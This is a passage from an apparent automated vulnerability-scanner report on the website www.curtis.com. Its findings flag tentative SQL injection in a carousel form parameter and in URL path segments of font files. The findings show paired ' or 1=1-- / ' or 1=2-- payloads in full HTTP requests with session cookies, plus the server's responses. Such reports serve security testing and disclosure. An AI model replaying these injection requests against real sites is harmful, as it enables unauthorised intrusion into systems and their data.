Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no16437454'%20or%201%3d2--%20&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.50. http://www.curtis.com/scripts/carousel/getimages.cfm [water_mark parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The water_mark parameter appears to be vulnerable to SQL injection attacks. The payloads 19764299'%20or%201%3d1--%20 and 19764299'%20or%201%3d2--%20 were each submitted in the water_mark parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no19764299'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no19764299'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.51. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15403378'%20or%201%3d1--%20 and 15403378'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr315403378'%20or%201%3d1--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr315403378'%20or%201%3d2--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.52. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11428496'%20or%201%3d1--%20 and 11428496'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.53. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sifr3/garamond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 38575443'%20or%201%3d1--%20 and 38575443'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr338575443'%20or%201%3d1--%20/garamond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /sifr338575443'%20or%201%3d2--%20/garamond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">

...[SNIP]...

1.54. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sifr3/garamond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18657485'%20or%201%3d1--%20 and 18657485'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/garamond.swf18657485'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
